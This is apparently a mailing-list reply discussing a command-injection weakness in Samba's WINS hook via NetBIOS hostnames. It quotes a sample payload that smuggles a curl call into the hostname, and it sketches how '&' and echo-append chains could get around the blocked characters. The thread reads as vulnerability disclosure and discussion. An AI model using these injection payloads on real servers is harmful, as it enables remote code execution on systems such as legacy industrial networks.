On 16/10/25 12:30, Caveney, Seamus G wrote:
Illegal characters in a NetBIOS hostname are:
\ / : * ? " < > | ,
notably excluding backticks and semicolons. I'm not deeply familiar
with the Samba code base but a glance at nbtname.c and winsserver.c
seems to suggest that those character limitations aren't enforced at
the protocol level, so it might be possible to use pipes, redirects
or exec a local binary with a short path. Otherwise, the easiest
exploitable payload I can think of would be:
;`curl ab.cd`;
The characters '<', ';', and '>' are blocked by the needs of the ldb
database that this server uses (I am not sure I checked '`', but it is
probably allowed). But of course '&' works just as well as ';'.
If '>' worked, I think you could build up a script with a lot of
"&echo foo>>x&" followed by a `tr`.
I'd be interested to see if anybody has a living Samba install
configured as a DC with WINS still running in 2025.
Me too!
The last indication of a 'wins hook' line I have seen was in 2016, and
that was commented out.
An example of a place that may use it is a factory where some machinery
is a few decades old and only knows WINS but otherwise still works well.
cheers,
Douglas
